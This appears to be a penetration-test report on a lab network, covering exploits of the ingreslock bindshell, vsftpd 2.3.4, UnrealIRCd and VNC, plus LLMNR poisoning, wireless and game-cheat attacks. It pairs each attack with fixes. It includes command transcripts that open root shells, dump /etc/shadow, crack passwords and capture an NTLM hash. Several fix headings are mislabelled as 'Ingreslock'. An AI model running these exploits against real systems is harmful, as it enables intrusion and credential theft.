SHELL BACKDOOR
A backdoor has been discovered on the system with the IP address of 192.168.0.239 through port 1524/TCP. It seems to have been installed by a malicious script, and provides the attacker with remote access to the system, allowing them to execute arbitrary commands. This level of access is at the administrative level with a bindshell, which gives the attacker complete control over the system, enabling them to modify critical system files and settings.
A bindshell is a shell that listens for incoming connections on a specific port and provides a remote command prompt to any connecting client. Attackers often use bindshell to gain remote access to a victim system and execute commands. By binding a shell to a specific port on the victim system, the attacker can connect to the shell remotely and execute commands as if they were physically present at the victim system's command prompt. With bindshell, attackers can perform a variety of malicious activities, such as stealing sensitive data, installing additional malware, or launching further attacks against other systems.
The attacker exploited a vulnerability in the ingreslock service to gain access to the system and create the bindshell backdoor. Ingreslock is a process that provides a mechanism for controlling access to shared memory in the Ingres database management system. The vulnerability allowed the attacker to execute arbitrary code on the system and create a bindshell on port 1524/tcp, giving them remote access to the system as an administrator and the ability to execute arbitrary commands.
How to Fix the Ingreslock Vulnerability
- Shut down the Ingreslock service: The simplest way to prevent exploitation of the Ingreslock vulnerability is to disable the service altogether. This can be done by stopping the service and ensuring that it is not set to start automatically on boot.
- Update the Ingres database: If you rely on the Ingres database, you should make sure that it is updated to the latest version. This will ensure that any known vulnerabilities have been patched and that the service is as secure as possible.
- Restrict access to port 1524: If you must keep the Ingreslock service running, you should restrict access to the port it uses (port 1524). This can be done by configuring a firewall to only allow connections from trusted sources or by using a network access control (NAC) solution.
- Implement secure remote access protocols: As noted earlier, Telnet is an insecure protocol that should be avoided in favor of more secure protocols like SSH. Implementing secure remote access protocols will help protect against not only the Ingreslock vulnerability but also other types of attacks.
- Regularly monitor and audit your systems: Monitoring your systems for suspicious activity and conducting regular security audits can help you identify and address any vulnerabilities, including the Ingreslock vulnerability.
Exploit
kali@kali: netcat 192.168.0.239 1524
root@host8:/#
root@host8:/# lsb_release -a
Distributor ID: Ubuntu 8.04
Codename: hardy
root@host8:/# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
root@host8:/# cat /etc/shadow ^C
With access to this machine, we were able to extract passwords and usernames from the shadow file. To convert the encrypted passwords in the shadow file to a format that can be used by the John The Ripper password cracking tool, we used the unshadow /etc/passwd /etc/shadow > passwordfile
command to combine the passwd and shadow files and create a new file called passwordfile. This file contains the hashed passwords and other user information in a format that can be used by John The Ripper to attempt to crack the passwords. We were successful in obtaining the passwords stored in the shadow file. Here are our findings on the matter.
Password: user(user)
Password: password(host8)
Password: postgres(postgres)
Password: services(services)
Password: 123456789(klog)
Password: 1234(vnc)
Password: changeme(msfadmin)
Password: batman(sys)
vsftpd
Upon analysis of the system with IP address 192.168.0.239, it has been determined that the installed version of vsftpd is outdated, thereby rendering it vulnerable to exploitation. Specifically, version 2.3.4 of vsftpd contains a security flaw that enables an attacker to gain unauthorized access to the system. The exploit takes advantage of an entry point through port 21, thereby enabling the attacker to establish a backdoor on port 6200. It is worth noting that the target system does not currently have an open port on 6200, which is indicative of good security practices.
To exploit the vsftpd vulnerability, the attacker needs to login with a specific string of characters. This can be achieved using Telnet, a network protocol that allows remote control of computers. After connecting to the target IP on port 21 with Telnet, the attacker can use the USER command followed by a string that contains a smiley face emoticon and a colon, like so: "USER some type of string:)". Next, the attacker must enter a password using the PASS command followed by another string. Once the login credentials are entered, the attacker can escape Telnet using the CTRL+] command and then pressing ENTER. The crucial element of the exploit is the smiley face emoticon in the login string. This character triggers a vulnerability in vsftpd 2.3.4 that allows the attacker to create a shell bound to port 6200. Once the shell is created, the attacker can connect to it using the command "nc target IP 6200". This will establish a connection with root access to the target system, allowing the attacker to execute commands and access sensitive information. It's important to note that this exploit can only be used on systems running vsftpd version 2.3.4 or earlier. Systems running a more recent version of vsftpd are not vulnerable to this attack.
Additionally, it's important to note that the use of Telnet can also pose significant security risks to a system. As previously mentioned in the discussion of the vsftpd exploit, Telnet lacks crucial encryption and authentication mechanisms, making it vulnerable to man-in-the-middle attacks and unauthorized access. It's essential to consider these risks and take appropriate measures to secure your system when using any network protocol. When using Telnet to share sensitive information, it's important to be aware of the inherent security risks. Telnet doesn't provide any encryption or authentication mechanisms, which means that an attacker who gains access to the network can easily impersonate a Telnet connection and gain unauthorized access to the system. This exposes your system to serious security risks and can result in compromised information. To avoid these risks, it's highly recommended to avoid using Telnet for any sensitive tasks. Instead, it's advisable to use secure protocols such as SSH (Secure Shell), which offers robust encryption and authentication mechanisms to safeguard against unauthorized access and interception of data.
How to Fix the Ingreslock Vulnerability
To address this vulnerability, it is recommended that you update vsftpd on your Ubuntu system. The process for updating vsftpd is straightforward and can be accomplished by following these steps:
sudo apt update
sudo apt install vsftpd ftp ufw -y
sudo systemctl enable vsftpd
sudo systemctl start vsftpd
sudo systemctl status vsftpd
Exploit - Metasploit
msf6 > use exploit/unix/ftp/vsftpd
msf6 exploit(unix/ftp/vsftpd_234) > set rhost 192.168.0.239
rhost => 192.168.0.239
msf6 exploit(unix/ftp/vsftpd_234) > exploit
[*]192.168.0.239:21 - Banner: 220 (vsFTPd 2.3.4)
[*]192.168.0.239:21 - USER: 331 Please specify the password.
[+]192.168.0.239:21 - Backdoor service has been spawned, handling ...
[+]192.168.0.239:21 - UID: uid=0(root) gid=0(root)
[*]192.168.0.239:21 - Found shell.
[*]192.168.0.239:21 - Command shell session 1 opened (10.0.0.3:35549 -> 192.168.0.239:6200)
uname -a
Linux host8 2.4.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
Exploit - Manual
kali@kali) >:~$ telnet 192.168.0.239
Trying 192.168.0.239....
Connected to 192.168.0.239.
220 (vsFTPD 2.3.4)
USER smile:)
331 Please specify the password.
Pass No
telnet> quit
Connection closed.
kali@kali) >:~$ nc 192.168.0.239 6200
whoami
root
UnrealIRCd
Upon analysis of the system with IP address 192.168.0.239, it has been determined that the installed version of UnrealIRCd is outdated, there by rendering it vulnerable to exploitation. Specifically, the vulnerable version contains a security flaw that enables an attacker to gain unauthorized access to the system. The exploit takes advantage of an entry point through port 6667 there by enabling the attacker to establish a backdoor. Once the backdoor is established, the attacker can connect to it remotely and execute commands with the permissions of the IRC daemon user, which leads to the compromise of the system. To address this vulnerability, it is recommended that you update UnrealIRCd on your system. The process for updating UnrealIRCd is straightforward and can be accomplished by following the instructions provided by the software vendor. Additionally, it's important to regularly monitor your system for any signs of unauthorized access and take appropriate measures to secure your system, such as implementing strong passwords, regularly updating software, and enabling firewalls to limit the exposure of open ports.
In the following documentation below, you will witness the execution of the UnrealIRCd exploit through the Metasploit framework, which is a commonly used tool with a wide range of exploits that can be employed on your system. After a very brief period of time, we successfully gained unauthorized access to the target system located at IP address 192.168.0.239, granting us complete control over the system.
How to Fix the UnrealIRCd Vulnerability
wget -O- https://raw.githubusercontent.com/unrealircd/unrealircd/unreal60_dev/doc/KEYS|gpg --import
gpg --verify unrealircd-6.0.7.tar.gz.asc unrealircd-6.0.7.tar.gz
File Checksums
SHA256: fc43081009012b2d7ec61f1a3dd14a6a180750ffb4605e8aec15f38de5fa8979
Exploit - Metasploit
kali@kali) >:~$ msfconsole
use exploit/unix/irc/unreal_ircd
msf6 exploit(unix/irc/unreal_ircd) set RHOSTS 192.168.0.239
msf6 exploit(unix/irc/unreal_ircd) show payloads
Compatible Payloads
0 payload/cmd/unix/bind_perl unix command shell, Bind TCP (via Perl)
msf6 exploit(unix/irc/unreal_ircd) set payload 0
msf6 exploit(unix/irc/unreal_ircd) run
[*]192.168.0.239:6667 - Connected to 192.168.0.239:6667
[*]192.168.0.239:6667 - Sending backdoor command ...
[*]Started bind TCP handler against 192.168.0.239:4444
[*]Command shell session 1 opened (10.0.0.3:40369 -> 192.168.0.239:4444)
whoami
root
VNC
During the penetration testing engagement, a brute force attack was successfully used to crack the VNC account password using Metasploit. It is important to note that such attacks are commonly employed by hackers to gain unauthorized access to systems and steal sensitive information. To prevent brute force attacks, it is recommended to use strong passwords that are at least 12 characters long and include a combination of uppercase and lowercase letters, numbers, and special characters. This makes the password much harder to guess or crack through brute force methods. Additionally, implementing a lockout policy that limits the number of login attempts can help protect against brute force attacks. For example, after a certain number of failed login attempts, the account can be locked out for a specific period of time or until an administrator unlocks it. This prevents attackers from repeatedly attempting to guess the password and increases the security of the VNC account. It is important to regularly review and update password policies and lockout policies to ensure they remain effective against the latest threats and attack methods.
msf6 auxiliary(scanner/vnc/vnc_login) run
[*]192.168.0.239:5900 - 192.168.0.239:5900 - Starting VNC login sweep
[*]192.168.0.239:5900 - No active DB -- Credential data will not be saved!
[+]192.168.0.239:5900 - Login Successful: : password
[*]Auxiliary module execution completed
LLMNR
A Local Link Multicast Name Resolution (LLMNR) poisoning attack was executed on the local network with the objective of intercepting the Windows 10 victim machine and retrieving the account username and password hash. This was achieved by exploiting the LLMNR protocol and tricking the victim machine into sending its authentication credentials to the attacker's machine instead of the intended network resource. This attack was initiated when the victim attempted to share a file over the network, which the attacker intercepted and used as an opportunity to carry out the exploit. The attack highlights the dangers of leaving LLMNR enabled on a network, as it can be exploited by attackers to carry out sophisticated attacks like this.
How to Fix the Ingreslock Vulnerability
Disabling LLMNR:
1. Open the Group Policy Editor in your version of Windows
2. Navigate to Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client
3. Under DNS Client, make sure that "Turn OFF Multicast Name Resolution" is set to Enabled
Exploit
kali@kali: sudo responder -I eth0 -e 10.0.0.100
[+] Poisoners: LLMNR [ON]
[+] Listening for events...
[*] [NBT-NS] Poisoned answer sent to 10.68.146.203 for name UNREALTECH (service: Domain Master Browser)
[*] [NBT-NS] Poisoned answer sent to 10.68.146.203 for name UNREALTECH (service: Browser Election)
[*] [NBT-NS] Poisoned answer sent to 10.68.146.203 for name UNREALTECH (service: File Server)
[SMB] NTLMv2-SSP Client: fe80::c183:6844:bed1:d2a6
[SMB] NTLMv2-SSP Username: UNREALTECH\Administrator
[SMB] NTLMv2-SSP Hash: Addministrator::9feadfa00013040
Firewall
During the penetration testing engagement, it was found that the Windows Firewall was disabled on certain environments, including the Windows 10 environment with the IP address 10.68.146.203. The lack of firewall protection exposes the system to various security threats such as unauthorized access, malware attacks, and data theft. It is essential to have an active firewall that can protect against both incoming and outgoing traffic to ensure that the system is secured from possible security breaches. Failure to activate the firewall can lead to severe consequences such as data loss, system compromise, and financial losses. Therefore, it is recommended to regularly monitor and maintain an active firewall on all systems and networks to prevent any potential security risks.
How to Fix the Ingreslock Vulnerability
1. Click on the Windows Start menu and type "Windows Defender Firewall" in the search bar.
2. Click on "Windows Defender Firewall with Advanced Security" to open the firewall configuration menu.
3. In the left pane, click on "Inbound Rules" and then "New Rule" to create a new inbound rule.
4. Follow the prompts to specify the rule type, protocol, and port number (if applicable). Select "Allow the connection"
5. Select "Allow the connection" and click "Next".
6. Choose the profiles to which the rule should apply and click "Next".
7. Give the rule a name and description, and click "Finish" to save the rule.
8. Repeat on all machines lacking a firewall
Wireless Attack PCAP
A Pcap file was obtained through a packet sniffer and used to decrypt wireless information over packes. This was decrypted with aircrack then feed into wireshark to view all decrypted packets over the network. Photos have been added to the photos page of this attack being carried out. With this being done we recommend that the company switches over to WPA2 imiditily as WPA is insucure also showen in the 2nd wireless attack.
Wireless Attack Deauth
A panda device was used in a deauthenticate attack within the airmon software. This devices was able to deauthenticate a windows computer off the network and capture the connection attempt that was made to join back into the network. Once this attack was completed we were able to obtain the password of the network. This can also be easily fixed with updating the devices to use WPA2 within the network. We recomand this is done imiditily to avoid any war drivers that may be in the area looking to attempt a hack into your network.
Tarkov Client
The client is susceptible to a severe memory-based attack that can be launched externally using Python or C++, or through Direct Memory Access (DMA) on an attacker's computer. Such an attack could enable hackers to gain complete control over the game, including manipulating players' positions, items on the map, and even teleporting around the map. The implications of such an attack can be quite severe and potentially compromise the integrity of the game. Therefore, it is imperative to implement robust security measures to prevent such attacks and ensure the safety and privacy of the game and its users.
This attack involves using SPT-AKI to collect pointers within the program, allowing for the gathering of information without interference from BattleEye. This enables the use of cheat engine, a well-known software for gathering pointer information with ease. Once the pointer information is obtained, an attacker can write Python or C++ code to create an external hack by viewing the pointers within the RAM and the values inside. This method allows for the attacker to bypass anti-cheat measures and gain an advantage within the game, potentially compromising the integrity of the game and its users.
Upcomming External Aimbot
New threats are emerging with an externally designed aimbot, which is now trackable with the new GitHub release. Originally, this required a Python library like YOLO, which would force you to take hundreds of images of the item you wanted to track and draw a box around it. This process would take a massive amount of time and deter hackers from using this exploit. However, with the new tracking software, "Track Anything," this is no longer necessary. All that needs to be added is a simple Python code that will control the mouse and move it to the object mask on the screen. This code is rather simple and can be completed in only a few lines. None the less, a basic hack of this using the Windows API mouse movement will still allow for easy banning of anyone using it. However, someone using a second computer with an Arduino makes this much more difficult. This old code was exploited on a 2nd single player game boarderlands 2 with a exzample in photos. Although it should be noted the slow performances is due to the high required performances for yolo and different frame rates from the tracker and the game. This problem would be fixed with a 2nd computer with YOLO tracking having high GPU requirements.
Fixing this problem is a lot more difficult because it is on the physical layer of the OSI model. This would require us to take a closer look at either the Arduino itself and detecting its use or using AI to detect aimbot hackers. Theoretically, this could be detected by comparing the movements of a real-life person to an AI aimbot. An aimbot would always want to draw a straight line from the current mouse position to the required headshot. This straight line could be detected as no human would draw a perfect straight line from two points on the computer with a mouse repeatedly. However, there is a problem with this concept because a hacker can add static to the AI to perform movement that is not perfect. We believe adding this is still beneficial as it requires the hacker to work harder to make an aimbot and deters script kiddies from putting together a simple script for an aimbot.
Track Anything